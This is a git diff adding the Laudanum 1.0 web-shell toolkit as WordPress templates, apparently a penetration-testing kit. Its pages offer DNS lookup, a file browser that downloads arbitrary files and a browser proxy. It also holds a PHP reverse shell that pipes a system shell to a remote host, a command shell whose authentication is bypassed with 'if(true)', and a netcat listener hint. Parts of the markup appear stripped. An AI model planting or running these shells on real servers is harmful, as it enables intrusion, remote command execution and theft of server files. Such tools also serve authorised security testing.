b/Web-Shells/laudanum-1.0/wordpress/templates/dns.php @@ -0,0 +1,144 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides access to DNS on the system. +*** Written by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP DNS Access + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$query = isset($_POST['query']) ? $_POST['query'] : ''; +$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; +?> + + + + Laudanum PHP DNS Access + + + + + + +

DNS Query 0.1

+
+
+ DNS Lookup: +

Query: + Type: + +

+
+ + +"; + echo "Result = "; + print_r($result); + echo "Auth NS = "; + print_r($authns); + echo "Additional = "; + print_r($addtl); + echo ""; +} +?> +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/file.php b/Web-Shells/laudanum-1.0/wordpress/templates/file.php new file mode 100644 index 00000000..d80a2ae0 --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/file.php @@ -0,0 +1,182 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file allows browsing of the file system. +*** Written by Tim Medin +*** +*** 12/28/2013 - updated by Jason Gillam - fixed parent folder. +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + +include 'ipcheck.php'; + + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP File Browser + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +//set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$dir = isset($_GET["dir"]) ? $_GET["dir"] : "."; +$file = isset($_GET["file"]) ? $_GET["file"] : ""; + +if ($file != "") { + if(file_exists($file)) { + + $s = split("/", $file); + $filename = $s[count($s) - 1]; + header("Content-type: application/x-download"); + header("Content-Length: ".filesize($file)); + header("Content-Disposition: attachment; filename=\"".$filename."\""); + readfile($file); + die(); + } +} +?> + + + + Laudanum File Browser + + + + + + +

Laudanum File Browser 0.1

+Home
+ +Directory listing of / "; +$breadcrumb = '/'; +foreach ($dirs as $d) { + if ($d != '') { + $breadcrumb .= $d . "/"; + echo "$d/ "; + } +} +echo ""; + +// translate .. to a real dir +$parentdir = ""; +for ($i = 0; $i < count($dirs) - 2; $i++) { + $parentdir .= $dirs[$i] . "/"; +} + +echo ""; +echo ""; +echo ""; + +//get listing, separate into directories and files +$listingfiles = array(); +$listingdirs = array(); + +if ($handle = @opendir($curdir)) { + while ($o = readdir($handle)) { + if ($o == "." || $o == "..") continue; + if (@filetype($curdir . $o) == "dir") { + $listingdirs[] = $o . "/"; + } + else { + $listingfiles[] = $o; + } + } + + @natcasesort($listingdirs); + @natcasesort($listingfiles); + + //display directories + foreach ($listingdirs as $f) { + echo ""; + } + + //display files + foreach ($listingfiles as $f) { + echo ""; + } +} +else { + echo ""; +} +?> +
NameDateSize
../
" . $f . "" . "
" . $f . "" . "" . number_format(@filesize($curdir . $f)) . "

Can't open directory

+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/host.php b/Web-Shells/laudanum-1.0/wordpress/templates/host.php new file mode 100644 index 00000000..aff4ac3d --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/host.php @@ -0,0 +1,126 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides a host lookup by ip address. +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Hostname by IP Lookup + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$query = isset($_POST['query']) ? $_POST['query'] : ''; +$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; +?> + + + + Laudanum Host Lookup + + + + + + +

Host Lookup 0.1

+
+
+ Host Lookup: +

IP: + + +

+
+ + +"; + echo "Result = "; + print_r($result); + echo ""; +} +?> +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/ipcheck.php b/Web-Shells/laudanum-1.0/wordpress/templates/ipcheck.php new file mode 100644 index 00000000..fe27d70c --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/ipcheck.php @@ -0,0 +1,61 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools +*** by someone other than the person who uploaded Laudanum. This file should be included +*** in other Laudanum tools and not called directly. +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + +// ***************** Config entries below *********************** +// IPs are enterable as individual addresses TODO: add CIDR support +$wpl_allowedIPs = array("192.168.0.2", "127.0.0.1", "172.16.179.1"); + + +# *********** No editable content below this line ************** + +$wpl_allowed = 0; +foreach ($wpl_allowedIPs as $IP) { + if ($_SERVER["REMOTE_ADDR"] == $IP) + $wpl_allowed = 1; +} + +if ($wpl_allowed == 0) { + header("HTTP/1.0 404 Not Found"); + die(); +} + +?> \ No newline at end of file diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/killnc.php b/Web-Shells/laudanum-1.0/wordpress/templates/killnc.php new file mode 100644 index 00000000..0c985872 --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/killnc.php @@ -0,0 +1,103 @@ + +*** Tim Medin +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file attempts to kill all netcat processes spawned by the current user. +*** This may be useful in cases where a reverse shell attempt has gone wrong. +*** +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Hostname by IP Lookup + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + + +?> + + + + Laudanum Kill nc + + + + +

Kill nc 0.1

+ + +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php b/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php new file mode 100755 index 00000000..c2cf80d9 --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php @@ -0,0 +1,194 @@ + array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + 2 => array("pipe", "w") // stderr is a pipe that the child will write to +); + +$process = proc_open($shell, $descriptorspec, $pipes); + +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} + +// Set everything to non-blocking +// Reason: Occsionally reads will block, even though stream_select tells us they won't +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); + +printit("Successfully opened reverse shell to $ip:$port"); + +while (1) { + // Check for end of TCP connection + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + + // Check for end of STDOUT + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + + // Wait until a command is end down $sock, or some + // command output is available on STDOUT or STDERR + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + + // If we can read from the TCP socket, send + // data to process's STDIN + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + + // If we can read from the process's STDOUT + // send data down tcp connection + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + + // If we can read from the process's STDERR + // send data down tcp connection + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} + +fclose($sock); +fclose($pipes[0]); +fclose($pipes[1]); +fclose($pipes[2]); +proc_close($process); + +// Like print, but does nothing if we've daemonised ourself +// (I can't figure out how to redirect STDOUT like a proper daemon) +function printit ($string) { + if (!$daemon) { + print "$string\n"; + } +} + +?> + + + diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/proxy.php b/Web-Shells/laudanum-1.0/wordpress/templates/proxy.php new file mode 100644 index 00000000..c82b110f --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/proxy.php @@ -0,0 +1,336 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file acts as a browser-based proxy. +*** Written by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page +// figure out how to reuse sessionid from the remote site + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Proxy + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + +function geturlarray($u) { + // creates the url array, addes a scheme if it is missing and retries parsing + $o = parse_url($u); + if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } + if (!isset($o["path"])) { $o["path"] = "/"; } + return $o; +} + +function buildurl ($u) { + // build the url from the url array + // this is used because the built in function isn't + // avilable in all installs of php + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"]) ? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + $s .= isset($u["path"]) ? $u["path"] : "/"; + $s .= isset($u["query"]) ? "?" . $u["query"] : ""; + $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; + return $s; +} + +function buildurlpath ($u) { + //gets the full url and attempts to remove the file at the end of the url + // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"])? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + + $path = isset($u["path"]) ? $u["path"] : "/"; + // is the last portion of the path a file or a dir? + // assume if there is a . it is a file + // if it ends in a / then it is a dir + // if neither, than assume dir + $dirs = explode("/", $path); + $last = $dirs[count($dirs) - 1]; + if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { + // its a file, remove the last chunk + $path = substr($path, 0, -1 * strlen($last)); + } + + $s .= $path; + return $s; +} + +function getfilename ($u) { + // returns the file name + // e.g. http://blah.com/dir/file.ext returns file.ext + // technically, it is the last portion of the url, so there is a potential + // for a problem if a http://blah.com/dir returns a file + $s = explode("/", $u["path"]); + return $s[count($s) - 1]; +} + +function getcontenttype ($headers) { + // gets the content type + foreach($headers as $h) { + if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function getcontentencoding ($headers) { + foreach ($headers as $h) { + if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function removeheader($header, $headers) { + foreach (array_keys($headers) as $key) { + if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { + unset($headers[$key]); + return $headers; + } + } +} + +function rewritecookies($headers) { + // removes the path and domain from cookies + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { + $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); + $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); + } + } + return $headers; +} + +function getsessionid($headers) { + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) + return $out[1][0]; + } + return "0"; +} + +function compatible_gzinflate($gzData) { + if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { + $i = 10; + $flg = ord( substr($gzData, 3, 1) ); + if ( $flg > 0 ) { + if ( $flg & 4 ) { + list($xlen) = unpack('v', substr($gzData, $i, 2) ); + $i = $i + 2 + $xlen; + } + if ( $flg & 8 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 16 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 2 ) + $i = $i + 2; + } + return @gzinflate( substr($gzData, $i, -8) ); + } else { + return false; + } + return false; +} + +function rewrite ($d, $u) { + $r = $d; + //rewrite images and links - absolute reference + $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); + //rewrite images and links - hard linked + $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); + //rewrite images and links - relative reference + $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); + + + //rewrite form - absolute reference + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + //rewrite form - hard linked + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + //rewrite form - relative reference + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + return $r; +} + +/* Initialize some variables we need again and again. */ +$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; +if ($url == "") { + $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; +} + +if ($url == "") { +?> + + + + Laudanum PHP Proxy + + + + + + +

Laudanum PHP Proxy

+ +
+ + +
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + + diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/settings.php b/Web-Shells/laudanum-1.0/wordpress/templates/settings.php new file mode 100644 index 00000000..06f9817f --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/settings.php @@ -0,0 +1,67 @@ + +*** Tim Medin +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides a convenient menu of Laudanum tools from a Word Press settings +*** page. +*** +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ +?> + + +
+

Laudanum Tools

+ + * for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888" +
+ \ No newline at end of file diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/shell.php b/Web-Shells/laudanum-1.0/wordpress/templates/shell.php new file mode 100644 index 00000000..1ba24458 --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/templates/shell.php @@ -0,0 +1,389 @@ + +*** Tim Medin +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides shell access to the system. It is built based on the 2.1 +*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler +*** +*** +*** Updated by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + +include 'ipcheck.php'; + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Shell Access + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +// set_error_handler('wpl_error_handler'); + + +function logout() { + $_SESSION = array('authenticated' => false); + if (isset($_COOKIE[session_name()])) + setcookie(session_name(), '', time()-42000, '/'); + session_destroy(); +} + + +function wpl_stripslashes_deep($value) { + if (is_array($value)) + return array_map('stripslashes_deep', $value); + else + return stripslashes($value); +} + +if (get_magic_quotes_gpc()) + $_POST = stripslashes_deep($_POST); + +/* Initialize some variables we need again and again. */ +//$username = isset($_POST['username']) ? $_POST['username'] : ''; +//$password = isset($_POST['password']) ? $_POST['password'] : ''; +//$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; + +$command = isset($_POST['command']) ? $_POST['command'] : ''; +$rows = isset($_POST['rows']) ? $_POST['rows'] : 24; +$columns = isset($_POST['columns']) ? $_POST['columns'] : 80; + + +///* Default settings --- these settings should always be set to something. */ +//$default_settings = array('home-directory' => '.'); + +///* Merge settings. */ +//$ini['settings'] = array_merge($default_settings, $ini['settings']); + + +session_start(); + +/* Delete the session data if the user requested a logout. This leaves the + * session cookie at the user, but this is not important since we + * authenticates on $_SESSION['authenticated']. */ +if (isset($_POST['logout'])) + logout(); + +///* Attempt authentication. */ +//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && +// isset($ini['users'][$username])) { +// if (strchr($ini['users'][$username], ':') === false) { +// // No seperator found, assume this is a password in clear text. +// $_SESSION['authenticated'] = ($ini['users'][$username] == $password); +// } else { +// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); +// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); +// } +//} + +/* Attempt authentication. */ +if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username])) + $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password)); + +/* Enforce default non-authenticated state if the above code didn't set it + * already. */ +if (!isset($_SESSION['authenticated'])) + $_SESSION['authenticated'] = false; + +if(true) { +//if ($_SESSION['authenticated']) { + /* Initialize the session variables. */ + if (empty($_SESSION['cwd'])) { + $_SESSION['cwd'] = '.'; + $_SESSION['history'] = array(); + $_SESSION['output'] = ''; + } + + if (!empty($command)) { + /* Save the command for late use in the JavaScript. If the command is + * already in the history, then the old entry is removed before the + * new entry is put into the list at the front. */ + if (($i = array_search($command, $_SESSION['history'])) !== false) + unset($_SESSION['history'][$i]); + + array_unshift($_SESSION['history'], $command); + + /* Now append the commmand to the output. */ + $_SESSION['output'] .= '$ ' . $command . "\n"; + + /* Initialize the current working directory. */ + if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) { + $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); + } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) { + /* The current command is a 'cd' command which we have to handle + * as an internal shell command. */ + + if ($regs[1]{0} == '/') { + /* Absolute path, we use it unchanged. */ + $new_dir = $regs[1]; + } else { + /* Relative path, we append it to the current working + * directory. */ + $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; + } + + /* Transform '/./' into '/' */ + while (strpos($new_dir, '/./') !== false) + $new_dir = str_replace('/./', '/', $new_dir); + + /* Transform '//' into '/' */ + while (strpos($new_dir, '//') !== false) + $new_dir = str_replace('//', '/', $new_dir); + + /* Transform 'x/..' into '' */ + while (preg_match('|/\.\.(?!\.)|', $new_dir)) + $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); + + if ($new_dir == '') $new_dir = '/'; + + /* Try to change directory. */ + if (@chdir($new_dir)) { + $_SESSION['cwd'] = $new_dir; + } else { + $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; + } + + } elseif (trim($command) == 'exit') { + logout(); + } else { + + /* The command is not an internal command, so we execute it after + * changing the directory and save the output. */ + chdir($_SESSION['cwd']); + + // We canot use putenv() in safe mode. + if (!ini_get('safe_mode')) { + // Advice programs (ls for example) of the terminal size. + putenv('ROWS=' . $rows); + putenv('COLUMNS=' . $columns); + } + + /* Alias expansion. */ + $length = strcspn($command, " \t"); + $token = substr($command, 0, $length); + if (isset($ini['aliases'][$token])) + $command = $ini['aliases'][$token] . substr($command, $length); + + $io = array(); + $p = proc_open($command, + array(1 => array('pipe', 'w'), + 2 => array('pipe', 'w')), + $io); + + /* Read output sent to stdout. */ + while (!feof($io[1])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), + ENT_COMPAT, 'UTF-8'); + } + /* Read output sent to stderr. */ + while (!feof($io[2])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), + ENT_COMPAT, 'UTF-8'); + } + + fclose($io[1]); + fclose($io[2]); + proc_close($p); + } + } + + /* Build the command history for use in the JavaScript */ + if (empty($_SESSION['history'])) { + $js_command_hist = '""'; + } else { + $escaped = array_map('addslashes', $_SESSION['history']); + $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; + } +} + +?> + + + + Laudanum Shell + + + + + + + +

Laudanum Shell

+ +
+ + + +
+ Authentication + + Login failed, please try again:

' . "\n"; + else + echo "

Please login:

\n"; + ?> + +

Username:

+ +

Password:

+ +

+ + + +
+ + + +
+ Current Working Directory: + + +
+ +

+ $  +

+
+ +

+ Size: × + + + +

+ +
+ + + +
+ + +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Updated by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +